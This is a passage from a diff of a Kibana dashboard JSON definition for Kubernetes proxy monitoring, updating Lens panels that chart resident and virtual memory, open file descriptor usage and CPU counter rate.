"last_value(kubernetes.proxy.process.memory.resident.bytes, kql='kubernetes.proxy.process.memory.resident.bytes: *')", - "isFormulaBroken": false - }, - "references": [ - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "scale": "ratio" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.memory.resident.bytes: *" - }, - "isBucketed": false, - "label": "Part of Resident memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.memory.resident.bytes" - }, - "96c80749-da61-425a-b637-878d33e410fd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Open file descriptors usage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", - "isFormulaBroken": false - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX2" - ], - "scale": "ratio" - }, - "96c80749-da61-425a-b637-878d33e410fdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.fds.open.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.fds.open.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.fds.max.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.fds.max.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 106, - "min": 0 - }, - "name": "multiply", - "text": "last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", - "type": "function" - } - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Virtual memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.proxy.process.memory.virtual.bytes, kql='kubernetes.proxy.process.memory.virtual.bytes: *')", - "isFormulaBroken": false - }, - "references": [ - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.memory.virtual.bytes: *" - }, - "isBucketed": false, - "label": "Part of Virtual memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.memory.virtual.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average SyncProxyRules latency " + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "w": 48, + "x": 0, + "y": 21 + }, + "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(239,249,218,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Process", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "af47c34c-961a-463c-9d66-ffedcc2eef12", + "w": 24, + "x": 0, + "y": 24 + }, + "panelIndex": "af47c34c-961a-463c-9d66-ffedcc2eef12", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "169f9d33-cf55-422e-906e-f4eecb26a362", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { + "columnOrder": [ + "6cbab896-ee42-4dad-8831-12f53cda0d6d", + "910bd079-4852-48bd-9d7a-e5eb940f0838", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "96c80749-da61-425a-b637-878d33e410fd", + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX2", + "96c80749-da61-425a-b637-878d33e410fdX1", + "910bd079-4852-48bd-9d7a-e5eb940f0838X0", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "columns": { + "6cbab896-ee42-4dad-8831-12f53cda0d6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "169f9d33-cf55-422e-906e-f4eecb26a362", - "key": "kubernetes.proxy.process.fds.open.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.proxy.process.fds.open.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" - }, - { - "alignment": "center", - "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" - }, - { - "alignment": "center", - "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "isTransposed": false - }, - { - "alignment": "center", - "colorMode": "text", - "columnId": "96c80749-da61-425a-b637-878d33e410fd", - "isTransposed": false, - "palette": { - "name": "custom", - "params": { - "colorStops": [ - { - "color": "#54B399", - "stop": 0 - }, - { - "color": "#D6BF57", - "stop": 60 - }, - { - "color": "#E7664C", - "stop": 90 - } - ], - "continuity": "above", - "name": "custom", - "rangeMax": null, - "rangeMin": 0, - "rangeType": "number", - "steps": 5, - "stops": [ - { - "color": "#54B399", - "stop": 60 - }, - { - "color": "#D6BF57", - "stop": 90 - }, - { - "color": "#E7664C", - "stop": 91 - } - ] - }, - "type": "palette" - } - } - ], - "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "layerType": "data" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "af47c34c-961a-463c-9d66-ffedcc2eef12", - "w": 24, - "x": 0, - "y": 24 - }, - "panelIndex": "af47c34c-961a-463c-9d66-ffedcc2eef12", - "title": "Proxy process data ", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { - "columnOrder": [ - "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "d523e6d2-50f3-4b45-8815-8259df43850c", - "cf481e4f-b568-4306-8da9-5e3d516ccbea", - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "columns": { - "7e1756d9-af1b-4204-a8d4-8c57987216f0": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbea": { - "dataType": "number", - "isBucketed": false, - "label": "average(kubernetes.proxy.process.memory.resident.bytes)", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "formula": "average(kubernetes.proxy.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "scale": "ratio" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of average(kubernetes.proxy.process.memory.resident.bytes)", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.memory.resident.bytes" - }, - "d523e6d2-50f3-4b45-8815-8259df43850c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "910bd079-4852-48bd-9d7a-e5eb940f0838": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Resident memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "formula": "last_value(kubernetes.proxy.process.memory.resident.bytes, kql='kubernetes.proxy.process.memory.resident.bytes: *')", + "isFormulaBroken": false + }, + "references": [ + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "scale": "ratio" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.memory.resident.bytes: *" + }, + "isBucketed": false, + "label": "Part of Resident memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.memory.resident.bytes" + }, + "96c80749-da61-425a-b637-878d33e410fd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Open file descriptors usage", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "layers": [ - { - "accessors": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbea" - ], - "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", - "yConfig": [] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false + "formula": "last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", + "isFormulaBroken": false + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX2" + ], + "scale": "ratio" + }, + "96c80749-da61-425a-b637-878d33e410fdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.fds.open.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.fds.open.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.fds.max.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.fds.max.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 100 + ], + "location": { + "max": 106, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", + "type": "function" } + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 21, - "i": "303702e1-ba33-49f2-b337-4cc7d7305606", - "w": 24, - "x": 24, - "y": 24 - }, - "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", - "title": "Average resident memory ", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - } + "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "formula": "last_value(kubernetes.proxy.process.memory.virtual.bytes, kql='kubernetes.proxy.process.memory.virtual.bytes: *')", + "isFormulaBroken": false + }, + "references": [ + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "scale": "ratio" + }, + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.memory.virtual.bytes: *" + }, + "isBucketed": false, + "label": "Part of Virtual memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.memory.virtual.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "169f9d33-cf55-422e-906e-f4eecb26a362", + "key": "kubernetes.proxy.process.fds.open.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.proxy.process.fds.open.count" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" + }, + { + "alignment": "center", + "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" + }, + { + "alignment": "center", + "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "isTransposed": false + }, + { + "alignment": "center", + "colorMode": "text", + "columnId": "96c80749-da61-425a-b637-878d33e410fd", + "isTransposed": false, + "palette": { + "name": "custom", + "params": { + "colorStops": [ + { + "color": "#54B399", + "stop": 0 + }, + { + "color": "#D6BF57", + "stop": 60 + }, + { + "color": "#E7664C", + "stop": 90 + } ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { - "columnOrder": [ - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "301759e0-f73e-4e6d-a7c5-d0938024e989", - "301759e0-f73e-4e6d-a7c5-d0938024e989X1", - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "columns": { - "236eb2de-d45f-43f2-83f4-5a1d7355132b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Counter rate", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "counter_rate(last_value(kubernetes.proxy.process.cpu.sec))", - "isFormulaBroken": false - }, - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X1" - ], - "scale": "ratio" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.cpu.sec: *" - }, - "isBucketed": false, - "label": "Part of Differences in Controller Proxy", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.cpu.sec" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Differences in Controller Proxy", - "operationType": "counter_rate", - "references": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "scale": "ratio", - "timeScale": "s" - }, - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { - "dataType": "string", - "isBucketed": true, - "label": "Top 20 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } + "continuity": "above", + "name": "custom", + "rangeMax": null, + "rangeMin": 0, + "rangeType": "number", + "steps": 5, + "stops": [ + { + "color": "#54B399", + "stop": 60 + }, + { + "color": "#D6BF57", + "stop": 90 + }, + { + "color": "#E7664C", + "stop": 91 + } + ] + }, + "type": "palette" + } + } + ], + "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Proxy process data " + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 21, + "i": "303702e1-ba33-49f2-b337-4cc7d7305606", + "w": 24, + "x": 24, + "y": 24 + }, + "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { + "columnOrder": [ + "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "d523e6d2-50f3-4b45-8815-8259df43850c", + "cf481e4f-b568-4306-8da9-5e3d516ccbea", + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "columns": { + "7e1756d9-af1b-4204-a8d4-8c57987216f0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "hideEndzones": false, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "301759e0-f73e-4e6d-a7c5-d0938024e989" - ], - "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "yConfig": [ - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" - } - ] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "showCurrentTimeMarker": false, - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "1604f0de-edd6-456e-8670-ab9b33988abb", - "w": 24, - "x": 0, - "y": 33 - }, - "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", - "title": "CPU usage increase over time", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "cf481e4f-b568-4306-8da9-5e3d516ccbea": { + "dataType": "number", + "isBucketed": false, + "label": "average(kubernetes.proxy.process.memory.resident.bytes)", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + }, + "formula": "average(kubernetes.proxy.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "scale": "ratio" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(249,235,223,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "HTTP Requests", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of average(kubernetes.proxy.process.memory.resident.bytes)", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.memory.resident.bytes" }, - "title": "", - "type": "metrics", - "uiState": {} + "d523e6d2-50f3-4b45-8815-8259df43850c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "f8313a9d-ab58-448e-b183-75f914caf53f", - "w": 48, - "x": 0, - "y": 45 + "fillOpacity": 0.3, + "layers": [ + { + "accessors": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbea" + ], + "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average resident memory " + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1604f0de-edd6-456e-8670-ab9b33988abb", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { + "columnOrder": [ + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "301759e0-f73e-4e6d-a7c5-d0938024e989", + "301759e0-f73e-4e6d-a7c5-d0938024e989X1", + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "columns": { + "236eb2de-d45f-43f2-83f4-5a1d7355132b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "**NOTE**: The default period to fetch the metrics used in **Requests counter rate , Client error responses counter rate** and **Server error responses counter rate** visualization is **10s**. The timestamps from the visualizations were chosen according to that. Otherwise, they might be inaccurate. Adjust them by clicking on the **settings wheel** on the top right of the visualization and go to the **right side menu**. After that, write the custom period value on **Horizontal axis \u003e @timestamp \u003e Minimum interval**.", - "openLinksInNewTab": false + "301759e0-f73e-4e6d-a7c5-d0938024e989": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Counter rate", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } + }, + "formula": "counter_rate(last_value(kubernetes.proxy.process.cpu.sec))", + "isFormulaBroken": false + }, + "references": [ + 